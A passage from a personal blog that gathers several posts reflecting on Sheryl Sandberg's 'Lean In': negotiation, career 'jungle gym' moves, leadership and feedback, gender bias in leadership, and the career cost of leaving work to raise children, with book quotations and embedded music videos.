trustedsignal -- blog, by davehull

Other thoughts from Lean In (2024-03-22)

<p>My previous posts in this series have touched on the core issues that Sheryl Sandberg addresses in her book <a href="https://www.alibris.com/Lean-in-Women-Work-and-the-Will-to-Lead-Sheryl-Sandberg/book/28224373?matches=778">Lean In: Women, Work, and the Will to Lead</a>. If you're interested in these issues, I encourage you to read the book and read the criticism as well.</p><p>In this post I want to cover some of the other things I found valuable or interesting from the book. Even if you disagree with Sandberg's core thesis, she was a key leader at Google and Facebook. You may not like Google or Facebook, but it's undeniable that they are two of the most successful companies of all time. Sandberg's track record demonstrates that she's an effective leader. 
Here are some random insights not necessarily tied to the central theme of the book that influenced or that aligned with my experiences and thinking.</p><div style="text-align: left;"><br /></div><div style="text-align: left;"><a href="https://trustedsignal.blogspot.com/2024/03/other-thoughts-from-lean-in.html#On_negotiation">On negotiation</a></div><div><div style="text-align: left;"><a href="https://trustedsignal.blogspot.com/2024/03/other-thoughts-from-lean-in.html#On_career_progression">On career progression -- it's a jungle gym, not a ladder</a></div></div><div><a href="https://trustedsignal.blogspot.com/2024/03/other-thoughts-from-lean-in.html#On_being_liked">On being liked v being effective</a></div><div><div style="text-align: left;"><a href="https://trustedsignal.blogspot.com/2024/03/other-thoughts-from-lean-in.html#On_evaluating">On evaluating and choosing opportunities</a></div><div style="text-align: left;"><a href="https://trustedsignal.blogspot.com/2024/03/other-thoughts-from-lean-in.html#On_leadership">On leadership, power, and getting things done</a></div><div style="text-align: left;"><a href="https://trustedsignal.blogspot.com/2024/03/other-thoughts-from-lean-in.html#On_communication" target="_blank">On communication, feedback, and performance</a></div><div style="text-align: left;"><a href="https://trustedsignal.blogspot.com/2024/03/other-thoughts-from-lean-in.html#On_feminism" target="_blank">On feminism</a></div><div style="text-align: left;"><a href="https://trustedsignal.blogspot.com/2024/03/other-thoughts-from-lean-in.html#The_last" target="_blank">The last word</a></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><a><br /></a></div><h3 style="text-align: left;"><a id="On_negotiation">On negotiation</a></h3></div><div>Sandberg tells us that "A study that looked at the starting salaries of students graduating with a master's degree from Carnegie Mellon University found that 57 percent of the male students, but 
only 7 percent of the female students, tried to negotiate for a higher offer." (Sandberg, 2013, p. 45) Is this another example of a lack of confidence or not wanting to come off as self-promoting? It may be. </div><p>I was deep into my own career before I ever bothered to negotiate for a higher salary. I had a co-worker tell me about his hiring process at our employer. He explained that he'd asked for $5K more than he was offered. I don't know what this represented in terms of his base pay, but I'm guessing it was around three percent. The company agreed to his request on the spot. A conversation lasting less than five minutes resulted in a three percent raise that paid out during all the years he worked for the company. If they'd said no, he would have accepted the original offer.</p><p>Sandberg tells us of her own experience negotiating with Mark Zuckerberg at Facebook. She tells Mark, "'Of course you realize that you're hiring me to run your deal teams, so you want me to be a good negotiator. This is the only time you and I will ever be on opposite sides of the table.' Then I negotiated hard." (Sandberg, 2013, p. 46)</p><p>I love her strategy. She's demonstrating the skills that Mark was hiring her for during the hiring process. Even if you're not going to run deal teams in a role you're interviewing for, you may be able to position your negotiation process in similar terms.</p><p><br /></p><h3 style="text-align: left;"><a id="On_career_progression">On career progression -- it's a jungle gym, not a ladder</a></h3><div><div><span style="font-family: inherit;">Another tale from the book that I enjoyed was about Lori Goler, a senior director of marketing at eBay, who reached out to Sandberg saying </span></div><div></div><blockquote><div>"I want to apply to work with you at Facebook... So I thought about calling you and telling you all of the things I'm good at and all of the things I like to do. Then I figured that everyone was doing that. 
So instead, I want to ask you: What is your biggest problem, and how can I solve it?" (Sandberg, 2013, pp. 52-53)</div></blockquote><p><span style="font-family: inherit;">Sandberg tells us that her problem was recruiting and that Goler had no experience in recruiting, but agreed to a less senior position to learn those skills; "she was willing to trade seniority for acquiring new skills." (Sandberg, 2013, pp. 52-53)</span></p><p><span style="font-family: inherit;"></span></p><blockquote>"The most common metaphor for careers is a ladder, but this concept no longer applies to most workers. As of 2010, the average American had eleven jobs from the ages of eighteen to forty-six alone. This means that the days of joining an organization or corporation and staying there to climb that one ladder are long gone... Pattie Sellers, ... conceived a much better metaphor: 'Careers are a jungle gym, not a ladder.'" (Sandberg, 2013, p. 53)</blockquote><p></p><div style="text-align: left;"><span style="font-family: inherit;">People want to show ever-increasing responsibility and titles that reflect that in their resumes, which is completely reasonable, but this is also a good way to "paint" oneself into a corner career-wise. There are benefits to lateral moves with different experiences. My own career has been a bit of a jungle gym. I've been in deep technical roles for most of my career, then moved to technical lead roles where I was doing technical work and directing others, not really managing them, which gave me some management exposure. I then moved back into a technical role with some sales engineering exposure where I got to do deep technical work that was also customer facing, then I moved into a technical manager role directing a team of people doing technical work with some sales engineering. 
After doing that for a few years, I went back into an individual contributor role doing deep technical work, and now I'm in a technical manager role.</span></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">These experiences don't have titles showing consistent upward progress. Going from a senior director title to a principal engineering title was more of a jungle-gym-style lateral move than an up-the-ladder move, but I think I'm better for it. That move gave me a deeper understanding of the detection engineering space and a chance to get back into software development.</span></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">Consider the story above about Lori Goler, who left her senior director role at eBay to work for Sandberg at Facebook in a role with a more junior title recruiting people. That move gave her an opportunity to learn an entirely new skillset. I see that today Goler is the Head of People at Meta. I'd say that jungle gym move paid off for her.</span></div></div><div><span style="font-family: inherit;"><br /></span></div><div><div><span style="font-family: inherit;">"Seeking out diverse experiences is useful preparation for leadership." (Sandberg, 2013, p. 62)</span></div></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;"><br /></span></div><h3 style="text-align: left;"><a id="On_being_liked">On being liked v being effective</a></h3><div><div>"Less than six months after I started at Facebook, Mark and I sat down for my first formal review. One of the things he told me was that my desire to be liked by everyone would hold me back... If you try to please everyone, you aren't making enough progress." (Sandberg, 2013, p. 51)</div><div><br /></div><div>Great insight here from Zuckerberg. 
It reminds me of a section of Phil Fisher's book <u>Common Stocks and Uncommon Profits</u>, where Fisher talks about how to evaluate companies for investment. One of the things he looks at is the relationship between management and labor. He obviously wants the relationship to be good, but tells us that an "absence of conflict may not mean a basically happy relationship so much as fear or the consequences of conflict." (Fisher, 1958, p. 66)</div><div><br /></div><div>If you're universally loved, you may not be making enough progress.</div></div><div><br /></div><div><br /></div><h3 style="text-align: left;"><a id="On_evaluating">On evaluating and choosing opportunities</a></h3><div><div>When Sandberg was thinking of joining Google, she had a spreadsheet where she was tracking pros and cons. </div><div><blockquote>"Eric responded with perhaps the best piece of career advice that I have ever heard. He covered my spreadsheet with his hand and told me not to be an idiot (also a great piece of advice). Then he explained that only one criterion mattered when picking a job -- fast growth. When companies grow quickly, there are more things to do than there are people to do them. When companies grow more slowly or stop growing, there is less to do and too many people to not be doing them. Politics and stagnation set in, and everyone falters... 'If you're offered a seat on a rocket ship, you don't ask what seat. You just get on.'" (Sandberg, 2013, p. 58)</blockquote></div></div><div><div>On joining Facebook as COO when other companies were offering to hire her as CEO: "As I did when I joined Google, I prioritized potential for fast growth and the mission of the company above title... I have seen both men and women miss out on great opportunities by focusing too much on career levels." (Sandberg, 2013, pp. 
60-61)</div><div><br /></div><div>Consider this statement in light of the ladder v jungle gym discussion above.</div><div><br /></div><div>I'm currently working at my third startup. All of them have been very rewarding places to work, offering diverse opportunities for fast growth. I've had offers to join startups in their infancy, but at this point in life, with college tuitions and a mortgage, I'm too risk-averse to be employee number three (maybe one day). As Sandberg says, "The cost of stability is often diminished opportunities for growth." (Sandberg, 2013, p. 61) The good news is that you can join startups at different points in their growth curves and get a good mix of growth and stability. You can even experience tremendous growth in large established companies, if you find the right team and management.</div></div><div><br /></div><div><br /></div><h3 style="text-align: left;"><a id="On_leadership">On leadership, power, and getting things done</a></h3><div><span style="font-family: inherit;">"It is hard to visualize someone as a leader if she is always waiting to be told what to do." (Sandberg, 2013, p. 35)</span></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">I'm reminded of what Steve Jobs said, <span style="background-color: white; color: #181818;">“It doesn't make sense to hire smart people and then tell them what to do. We hire smart people so they can tell us what to do.” (<a href="https://www.goodreads.com/quotes/8586131-it-doesn-t-make-sense-to-hire-smart-people-and-then" target="_blank">Jobs, 2011</a>) When I hire people for roles on my team, one thing I'm always trying to gauge is their capacity for self-direction and the innovative ideas and execution that they will bring to the team.</span></span></div><div><br /></div><div>Sandberg quotes Alice Walker: "The most common way people give up their power is by thinking they don't have any." (Sandberg, 2013, p. 
63) One of my favorite restaurants in my hometown has this on a poster on the wall. It's worth regular reflection.</div><div><br /></div><div><div>"Asking for input is not a sign of weakness but often the first step to finding a path forward." (Sandberg, 2013, p. 71)</div><div><br /></div></div><div><div>"... true leadership comes from individuality that is honestly and sometimes imperfectly expressed... leaders should strive for authenticity over perfection." (Sandberg, 2013, p. 91)</div><div><br /></div><div>Related to the above, but not directly to leadership and power: "Another one of my favorite posters at Facebook declares in big red letters, 'Done is better than perfect.'" (Sandberg, 2013, p. 125)</div><div><br /></div><div><div>"Counterintuitively, long-term success at work often depends on not trying to meet every demand placed on us." (Sandberg, 2013, p. 126)</div><div><br /></div><div>"It is difficult to distinguish between the aspects of a job that are truly necessary and those that are not." (Sandberg, 2013, p. 130)</div><div><br /></div><div><span style="font-family: inherit;">The previous two quotes echo Jobs: </span></div><div><span style="font-family: inherit;"><span style="background-color: white; color: #181818;"></span></span></div></div></div><blockquote><div><div><div><span style="font-family: inherit;"><span style="background-color: white; color: #181818;">“People think focus means saying yes to the thing you've got to focus on. But that's not what it means at all. It means saying no to the hundred other good ideas that there are. You have to pick carefully. I'm actually as proud of the things we haven't done as the things I have done. 
Innovation is saying no to 1,000 things.” (</span><a href="https://www.goodreads.com/quotes/629613-people-think-focus-means-saying-yes-to-the-thing-you-ve" style="background-color: white;" target="_blank">Jobs, 2011</a><span style="background-color: white; color: #181818;">)</span></span></div></div></div><div></div></blockquote><div><div>On Facebook culture: "The company operated by moving quickly and tolerating mistakes..." (Sandberg, 2013, p. 74)</div><div><br /></div><div><br /></div><h3 style="text-align: left;"><a id="On_communication">On communication, feedback, and performance</a></h3><div>"Another way I try to foster authentic communication is to speak openly about my own weaknesses." (Sandberg, 2013, p. 85)</div></div><div><div><div><br /></div><div>Always own your mistakes openly, especially when you're a leader. It sets the right example and shows others that mistakes are part of the process of failing forward.</div><div><br /></div><div>Think what you will about Mark Zuckerberg. I love this story from Sandberg's book:</div><div><blockquote>"When people are open and honest, thanking them publicly encourages them to continue while sending a powerful signal to others," which she follows with this powerful example, "At a summer barbecue four years ago, an intern told Mark that he should work on his public speaking skills. Mark thanked him in front of everyone and then encouraged us to extend him a full-time job offer." (Sandberg, 2013, p. 86)</blockquote></div><div>Zuckerberg could have gone in a very different direction with that feedback, but he had the presence of mind to consider that the feedback was warranted and recognized that the intern had the courage to speak his mind.</div><div><br /></div></div><div>"... being open to the truth means taking responsibility for mistakes." (Sandberg, 2013, p. 
84)</div></div><div></div><blockquote><div>"Authentic communication is not always easy, but it is the basis for successful relationships at home and real effectiveness at work. Yet people constantly back away from honesty to protect themselves and others. This reticence causes and perpetuates all kinds of problems: uncomfortable issues that never get addressed, resentment that builds, unfit managers who get promoted rather than fired, and on and on." (Sandberg, 2013, pp. 77-78)</div><div></div></blockquote><div>"... someone's performance is assessed by someone else's perception." (Sandberg, 2013, p. 78)</div><div><br /></div><div><div>"It is nearly impossible to know how our actions are perceived by others. We can try to guess what they're thinking, but asking directly is far more effective." (Sandberg, 2013, p. 81)</div></div><div><div></div><blockquote><div>"One thing that helps is to remember that feedback, like truth, is not absolute. Feedback is an opinion, grounded in observations and experiences, which allows us to know what impression we make on others. The information is revealing and potentially uncomfortable, which is why all of us would rather offer feedback to those who welcome it." (Sandberg, 2013, p. 83)</div><div></div></blockquote><div>"Truth is better served by using simple language." (Sandberg, 2013, p. 79)</div></div><div><br /></div><div>"When communicating hard truths, less is often more." (Sandberg, 2013, p. 80)</div><div><br /></div><div>"restating the other person's point before responding to it." (Sandberg, 2013, p. 80)</div><div><br /></div><div>"reflecting someone's viewpoint clarifies the disagreement and becomes a starting point for resolution. We all want to be heard, and when we focus on showing others that we are listening, we actually become better listeners." (Sandberg, 2013, p. 81)</div><div><br /></div><div>"... people rarely seek enough input." (Sandberg, 2013, p. 
81)</div><div><br /></div><div>Sandberg tells the story of her first week working for Robert Rubin, Secretary of the Treasury, when she was invited to a meeting about restructuring the IRS. Being new and not knowing much about the subject, she did not take a seat at the conference room table: </div><div></div><blockquote><div>"Toward the end of the meeting, Secretary Rubin suddenly turned and asked, 'Sheryl, what do you think?' I was stunned silent -- my mouth opened but nothing came out. When he saw how shocked I was, Secretary Rubin explained why he had put me on the spot: 'Because you're new and not fully up to speed on how we do things, I thought you might see something we were missing... Rubin sent a powerful message... about the value of soliciting ideas from every corner..." (Sandberg, 2013, p. 82)</div><div></div></blockquote><div>Whenever someone new joins my team, I try to emphasize that they should ask questions <b>and offer suggestions</b> precisely because they are new. Their fresh perspective may help us see things that we've been overlooking.</div><div><br /></div><div>"... the traditional practice of judging employees by face time rather than results unfortunately persists. Because of this, many employees focus on hours clocked in the office rather than on achieving their goals as effectively as possible." (Sandberg, 2013, p. 130)</div><div><br /></div><div>Quoting General Colin Powell: "... I am paying them for the quality of their work, not for the hours they work." (Sandberg, 2013, p. 131)</div><div><br /></div><div>"Instead of perfection, we should aim for sustainable and fulfilling." (Sandberg, 2013, pp. 138-139)</div><div><br /></div><div><a><br /></a></div><h3 style="text-align: left;"><a id="On_feminism">On feminism</a></h3><div>"A feminist is someone who believes in social, political, and economic equality of the sexes." (Sandberg, 2013, p. 
158)</div><div><br /></div><div>That's how I've always defined it too, and that's pretty close to the dictionary definition. Hard to see how any rational person could not be a feminist.</div><div><br /></div><div><a><br /></a></div><h3 style="text-align: left;"><a id="The_last">The last word</a></h3><div>"We should expect professional behavior, and even kindness, from everyone." (Sandberg, 2013, p. 165)</div>

Overcoming our "bossypants" bias (2024-03-14)

<p>This is the fifth post in a series of posts inspired by reading Sheryl Sandberg's book, <a href="https://www.alibris.com/Lean-in-Women-Work-and-the-Will-to-Lead-Sheryl-Sandberg/book/28224373?matches=778">Lean In: Women, Work, and the Will to Lead</a>. </p><p><a href="https://trustedsignal.blogspot.com/2024/03/whats-cause-of-problem-two.html" target="_blank">We've previously looked at some of Sandberg's evidence</a> </p><p></p><ul style="text-align: left;"><li>That women are underrepresented in positions of power and leadership</li><li>How lack of confidence contributes to the issue</li><li>How decisions about having children play a role in the problem</li></ul><div>If you've read the posts in this series, you may be thinking Sandberg is blaming the victim. Indeed, some critics make that claim, but I don't think a sincere reading of the book leads to that conclusion. The problem goes deeper. It's cultural.</div><div><br /></div><div>When a male leader is assertive, decisive, and direct, people may see him as a strong leader. When a female exhibits these same qualities, people think she's bossy. 
In <u>Lean In</u> Sandberg quotes Deborah Gruenfeld, a professor of leadership and organizational behavior at Stanford, as saying,</div><div></div><blockquote><div>"Our entrenched cultural ideas associate men with leadership qualities and women with nurturing qualities and put women in a double bind... We believe not only that women are nurturing, but that they should be nurturing above all else. When a woman does anything that signals she might not be nice first and foremost, it creates a negative impression and makes us uncomfortable." (Sandberg, 2013, p. 43)</div></blockquote><p>Echoes of this are present throughout our culture. I found it in Maria Konnikova's book <u>The Biggest Bluff: How I Learned to Pay Attention, Master Myself, and Win</u>, in which Konnikova documents dedicating a year to learning the popular poker game of Texas Hold 'em and competing in the World Series of Poker. Her coach is advising her to play more aggressively. She struggles with this advice, saying,</p><div style="text-align: left;"><span style="font-family: inherit;"></span><blockquote><span style="font-family: inherit;">"It comes to me then, the thing that's been nagging at me, and I don't at all like the realization: a lot of my failure to up the aggression factor is due to my social conditioning. Over the years, I've learned that it doesn't pay to be aggressive while female. It's unattractive to those in power namely men, but also some of those women who have managed to make it to the top and now don't want to jeopardize their position." (Konnikova, 2020, p. 101)</span></blockquote></div><div>More succinctly, "... success and likeability are negatively correlated for women." (Sandberg, 2013, p. 153)</div><p>We need to overcome this cultural resistance and celebrate good leadership qualities regardless of whether they come from men, women, or non-binary individuals. 
Good leaders should be recognized as good leaders regardless of biological sex or gender.</p><div>If women in leadership roles were common, this bias against female leaders might fade. As Sandberg says, "Real change will come when powerful women are less of an exception." (Sandberg, 2013, p. 50)</div><div><br /></div><div><div>Recognizing that we may have implicit biases against female leadership and talking about how to overcome it may help improve things -- "The simple act of talking openly about behavioral patterns makes the subconscious conscious." (Sandberg, 2013, p. 148)</div><div><br /></div><div>One story Sandberg recounts further underpins the cultural bias:</div><div><blockquote>"Jocelyn Goldfein, one of the engineering directors at Facebook, held a meeting with our female engineers where she encouraged them to share the progress they had made on the products they were building. Silence. No one wanted to toot her own horn. Who would want to speak up when <b>self-promoting women are disliked</b>?" (Sandberg, 2013, p. 44)</blockquote><p>In general, I think most self-promoters are disliked regardless of gender, but consider the situation: an engineering director encouraging female engineers to "share the progress on the products they were building." Speaking up in this context hardly seems like self-promotion, but I'm a male, and the fact that I see it this way may be more evidence of the problem.</p><p>What follows regarding this situation is interesting: "Jocelyn switched her approach. Instead of asking the women to talk about themselves, she asked them to tell one another's stories. The exercise became communal, which put everyone at ease." (Sandberg, 2013, p. 44)</p><p>As an engineering leader, I am interested in this communal approach because, as Sandberg tells us and my own experience has shown, "... well-functioning groups are stronger than individuals." (Sandberg, 2013, p. 
48)</p></div></div><div>Reading <u>Lean In</u> gives one the sense that a vicious cycle is at work. Cultural biases against strong females and a desire to be liked dampen women's desire to speak up and may prevent them from seeking leadership positions. The resulting lack of representative female leadership perpetuates the cultural bias that leadership roles aren't for women and reinforces the stereotype that women should be nice and nurturing rather than strong and assertive. The cultural pressure to be nurturing may reinforce women's thinking about childrearing, causing them to leave the workforce and, too often, to leave before they leave, again reducing the number of women in the workforce and in positions of leadership.</div><div><br /></div><div>In the book, Sandberg speaks about mentorship as a possible means of improving things. Here again, the vicious cycle is reinforced. Because there are more men in positions of leadership and fewer women in the workforce, male leaders typically choose to mentor junior men in their organizations simply because there are more of them.</div><div><br /></div><div><div>"Mentorship and sponsorship are crucial for career progression. Both men and women with sponsors are more likely to ask for stretch assignments and pay raises than their peers of the same gender without sponsors." (Sandberg, 2013, p. 66)</div><div><br /></div><div><div>If there were more women in leadership positions, more junior women in organizations might find good mentors. </div><div><br /></div></div><div>In the first post in this series, I quoted Sandberg quoting Kunal Modi. Recall that Modi said, "for the sake of American corporate performance and shareholder returns, men must play an active role in ensuring that the most talented young workers (often women...) are being encouraged to advocate for their career advancement..." (Sandberg, 2013, pp. 165-166)</div><div><br /></div><div>"Men of all ages must commit to changing the leadership ratios. 
They can start by <b>actively seeking out qualified female candidates</b> to hire and promote. And if qualified candidates cannot be found, then we need to invest in more recruiting, mentoring, and sponsoring so women can get the necessary experience." (Sandberg, 2013, p. 166)</div><div><br /></div><div>On the above point of being unable to find qualified candidates and the call to invest more in recruiting, mentoring, and sponsoring female candidates, I'd be curious to hear from the economists. Is this an effective use of a company's resources? Does it make more financial sense to just hire from the available supply of talent? I believe there's value in a diverse team, but how is that effectively measured? How much additional time and effort should a profit-driven company spend recruiting? What is the return on that investment? There are anecdotes online and references to studies showing that women-led companies outperform male-led companies. (<a href="https://www.apa.org/topics/women-girls/female-leaders-make-work-better#:~:text=Decades%20of%20studies%20show%20women,companies%20are%20led%20by%20women." target="_blank">Novotney, 2023</a>)</div><div><br /></div><div><div>If we're unable to spend extra effort to recruit qualified females, it's a no-brainer that we should encourage our best contributors to advocate for themselves, to strive for more responsibility, to speak up, and to lean in. Being a manager and a mentor aren't the same thing. Encourage members of your team to find mentors. Help them find one, if they want, and be a mentor to someone outside your team or organization.</div></div><div><br /></div><div>As Modi said, our motivations don't need to be altruistic because more female leadership doesn't just "lead to fairer treatment for all women." 
Sandberg tells us that "Research already suggests that companies with more women in leadership roles have better work-life policies, smaller gender gaps in executive compensation, and more women in midlevel management." (Sandberg, 2013, p. 171)</div></div><div><br /></div><div><div>"More female leadership will lead to fairer treatment for all women." (Sandberg, 2013, p. 171) </div></div><div><br /></div><div>I hope that one day female leadership is so common we don't really notice it anymore. As Sandberg says,</div><div><div>"In the future, there will be no female leaders. There will just be leaders." (Sandberg, 2013, p. 172)</div><div><br /></div><div>If you're a man in a traditional (i.e. heteronormative) relationship, you can help in simple ways. "... when asked at a conference what men could do to help advance women's leadership, Harvard Business School professor Rosabeth Moss Kanter answered, 'The laundry.'" (Sandberg, 2013, p. 110)</div><div><br /></div><div>I've been talking to my wife about <u>Lean In</u> and many of the topics discussed in this series of posts. We were talking about doing chores around the house the other day and she was telling me about some videos she'd seen online of women talking about their husbands doing things around the house like vacuuming, cleaning bathrooms, etc. and telling their wives that they were trying to "help out." These women were glad for the efforts, but annoyed at the reasoning. Don't do things around your own home to "help out," do them because you're an adult living in the environment and the tasks need doing. When you say you're doing it to "help out," you're implying that it's not actually your responsibility.</div><div><br /></div><div><u>Lean In</u> has more to say on these topics than I've covered in this series of posts. Writing these posts has helped me think more deeply about these issues. If you've read or skimmed these posts, I hope they have given you something to think about. 
In that vein, this time I'm going to leave you with Aretha Franklin's "Think."</div></div><div><br /></div><div>Next post, I'm going to share some of the insights from <u>Lean In</u> that I thought were interesting or thought-provoking and not necessarily relevant to the central theme of the book, but things that gave me a new perspective, helped me clarify my thinking, challenged me in some way, or that I identified with.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://www.youtube.com/watch?v=Vet6AHmq3_s" target="_blank">Aretha Franklin, "Think" (YouTube video)</a></div>

What's the cause of the problem part two (2024-03-08)

<p>This is the fourth post in a series of posts inspired by reading Sheryl Sandberg's book, <a href="https://www.alibris.com/Lean-in-Women-Work-and-the-Will-to-Lead-Sheryl-Sandberg/book/28224373?matches=778">Lean In: Women, Work, and the Will to Lead</a>. </p><p><a href="https://trustedsignal.blogspot.com/2024/03/whats-cause-of-problem.html" target="_blank">Previously</a> we discussed lack of confidence as one of the causes that Sandberg cites for the lack of women in leadership roles. Another reason she gives is pregnancy and childrearing. It's not just that women leave the workforce when they give birth; it's also that they factor pregnancy and childrearing into decisions about whether or not to take on bigger roles and more responsibilities -- "they leave before they leave," Sandberg says. (Sandberg, 2013, p. 93)</p><p>Sandberg encourages women to take the opposite approach. If they are interested in achieving more, she encourages them to pursue bigger roles and more responsibility. 
"The months and years leading up to having children are not the time to lean back, but the critical time to lean in." (Sandberg, 2013, p. 95)</p><div><div>According to Sandberg, "forty-three percent of highly qualified women with children are leaving careers, or 'off-ramping' for a period of time." (Sandberg, 2013, p. 98)</div><div><br /></div><div>What's more, "only 74 percent of professional women will rejoin the workforce in any capacity, and only 40 percent will return to full-time jobs..." (Sandberg, 2013, p. 102)</div><div><br /></div><div>That's a significant percentage of "highly qualified" individuals leaving the workforce. This loss of good people impacts the companies and organizations where they work, but it has an even greater impact on the lifetime earnings of those women. Obviously those who never return face the greatest impact to their earnings, but even for those who return, "controlling for education and hours worked, women's average annual earnings decrease by 20 percent if they are out of the workforce for just one year. Average annual earnings decline by 30 percent after two to three years." (Sandberg, 2013, p. 102) Factor in compounding over a lifetime and the financial impacts are highly consequential.</div><div><br /></div></div><div>I mentioned previously that I'm the father of daughters. My wife and I did the "back of the envelope" math and calculated that having her quit her job to stay home with our children was more cost effective than having her work and paying for full-time childcare. Except we didn't factor in the loss of future earnings. In fact, I was never even aware of this oversight until I read "... professional women need to measure the cost of child care against their future salary rather than their current salary." (Sandberg, 2013, p. 102)</div><div><br /></div><div>I love this insight by Sandberg. 
Impact on future earnings is just the kind of thing an excellent business leader would factor in when making a decision to leave the workforce, even if temporarily, for an extended amount of time following childbirth.</div><div><br /></div><div>We believe there are benefits to having a parent deeply involved in the day-to-day childrearing, but Sandberg provides evidence that children raised by multiple caregivers fare just as well as those where their mother is the primary caregiver.</div><div><div></div><blockquote><div>"In 2006, the researchers released a report summarizing their findings, which concluded that 'children who were cared for exclusively by their mothers did not develop differently than those who were also cared for by others.' They found no gap in cognitive skills, language competence, social competence, ability to build and maintain relationships or in the quality of the mother-child bond." (Sandberg, 2013, pp. 135-136)</div></blockquote><div>Further, "Some data even suggest that having two parents working outside the home can be advantageous to a child's development, particularly for girls." (Sandberg, 2013, p. 136) And Sandberg tells us, "We all need to encourage men to lean in to their families." (Sandberg, 2013, p. 113) After all, </div></div><div><blockquote><div>"children with involved and loving fathers have higher levels of psychological well-being and better cognitive abilities. When fathers provide even just routine child care, children have higher levels of educational and economic achievement and lower delinquency rates. Their children even tend to be more empathetic and socially competent. These findings hold true for children from all socioeconomic backgrounds, whether or not the mother is highly involved." (Sandberg, 2013, p. 
113)</div></blockquote><p>Ultimately it should be up to each individual to decide if they want to leave the workforce to raise children or if they want to go after that next promotion (or both), but individuals should be informed about the financial implications of those decisions and the equation isn't just about the present day cost of childcare.</p><div style="text-align: left;"><span style="background-color: white; font-family: inherit;"><span jsname="YS01Ge">Now I'll leave you with some related words from Beyoncé from her song Flawless, enjoy the video.<br /></span><blockquote><span jsname="YS01Ge">I took some time to live my life<br /></span><span jsname="YS01Ge">But don't think I'm just his little wife<br /></span><span jsname="YS01Ge">Don't get it twisted, get it twisted<br /></span><span jsname="YS01Ge">This my shit, bow down, bitches</span></blockquote><span jsname="YS01Ge"></span></span></div><p></p><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/IyuUWOnS9BY" width="320" youtube-src-id="IyuUWOnS9BY"></iframe></div></div>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-49353201291135010742024-03-03T16:52:00.000-08:002024-03-08T13:06:48.438-08:00What's the Cause of the Problem?<p>This is the third post in a series of posts inspired by reading Sheryl Sandberg's book, <a href="https://www.alibris.com/Lean-in-Women-Work-and-the-Will-to-Lead-Sheryl-Sandberg/book/28224373?matches=778">Lean In: Women, Work, and the Will to Lead</a>. In the <a href="https://trustedsignal.blogspot.com/2024/02/the-problem-is-people-but-which-people.html" target="_blank">previous post</a>, I shared some of the statistics from Sandberg's book and other sources that show that women are underrepresented in leadership and technical roles. 
Even in fields where women dominate leadership positions, like human resources roles, they are underpaid compared to their male counterparts.</p><p>In this post, I'll share some notes from the book that may explain why this disparity persists.</p><h4 style="text-align: left;">Is it a confidence game?</h4><div>One of the reasons Sandberg cites for women being underrepresented may be tied to a lack of confidence, or perhaps a surplus of confidence from their male counterparts.</div><div><br /></div><div style="text-align: left;"><span style="font-family: inherit;"><span style="font-weight: normal;">"An internal report at Hewlett-Packard revealed that women only apply for open jobs if they think they meet 100 percent of the criteria listed. Men apply if they think they meet 60 percent of the requirements. This difference has a huge ripple effect. Women need to shift from thinking 'I'm not ready to do that' to thinking 'I want to do that -- and I'll learn by doing it.'" <span style="font-family: inherit;">(</span></span></span><span style="font-weight: normal;"><span style="font-family: inherit;">Sandberg, 2013, p. 62)</span></span></div><div style="text-align: left;"><span style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></span></div><div style="text-align: left;"><span style="font-weight: normal;"><span style="font-family: inherit;">Sandberg goes on to share an anecdote from Cisco's then chief technology officer, Padmasree Warrior. The Huffington Post asked her, "What's the most important lesson you've learned from a mistake you've made in the past?" (Sandberg, 2013, p. 
35)</span></span></div><div style="text-align: left;"><span style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></span></div><div style="text-align: left;"><span style="font-weight: normal;"><span style="font-family: inherit;">Warrior responds, </span></span></div><div style="text-align: left;"><span style="font-weight: normal;"><span style="font-family: inherit;"></span></span></div><blockquote><div style="text-align: left;"><span style="font-weight: normal;"><span style="font-family: inherit;">"</span></span>I said no to a lot of opportunities when I was just starting out because I thought, 'That's not what my degree is in' or 'I don't know about that domain.' In retrospect, at a certain point it's your ability to learn quickly and contribute quickly that matters. One of the things I tell people these days is that there is no perfect fit when you're looking for the next big thing to do. You have to take opportunities and make an opportunity fit for you, rather than the other way around. The ability to learn is the most important quality a leader can have." (Sandberg, 2013, p. 35)</div></blockquote><div style="text-align: left;">Sandberg elaborates on the confidence issue, "self-doubt becomes a form of self-defense... We put ourselves down before others can." (Sandberg, 2013, p. 41)</div><div style="text-align: left;"><div><br /></div><div>I've been told throughout my career that I'm self-effacing, overly modest and too self-critical. I never recognized until reading these words that it could be a form of self-defense. Like Warrior, I've also held myself back from applying for roles I was interested in because I didn't think I was a perfect fit.</div><div><br /></div><div>We do ourselves a disservice when we sell ourselves short and hold ourselves back due to a lack of confidence, thinking we can't learn some new thing quickly enough. I'm reminded of attending interview training when I worked at Microsoft. 
Confidence was one of the things that we were asked to assess, as data supports the idea that confidence is a predictor of employee effectiveness.</div><div><br /></div><div>Confidence isn't fixed, fortunately. We can improve our self-efficacy through new achievements. The old saying, "Success breeds success," is true. As managers, we can help by encouraging our teams; reminding them that we believe in them; giving them more responsibility and increasingly challenging tasks; being there when they need help, and when they fail at something, helping them reflect on, <b>learn from the failure, and move on. Too much focus on failures undermines confidence</b>.</div><div><br /></div><div>Self-doubt holds us all back, and Sandberg points to data indicating this is a bigger problem for women than for men, hence it contributes to the disparity in female representation in leadership and technical roles. <span style="font-family: inherit;">In the next post in this series, I'll <a href="https://trustedsignal.blogspot.com/2024/03/whats-cause-of-problem-two.html" target="_blank">continue exploring more of the reasons for this disparity</a>.</span></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">If you need a little confidence boost, put on your headphones and crank this up.<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/cwLRQn61oUY" width="320" 